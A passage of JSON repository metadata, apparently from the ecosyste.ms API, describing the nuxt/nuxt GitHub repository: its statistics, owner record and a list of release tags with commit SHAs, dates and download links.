Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecos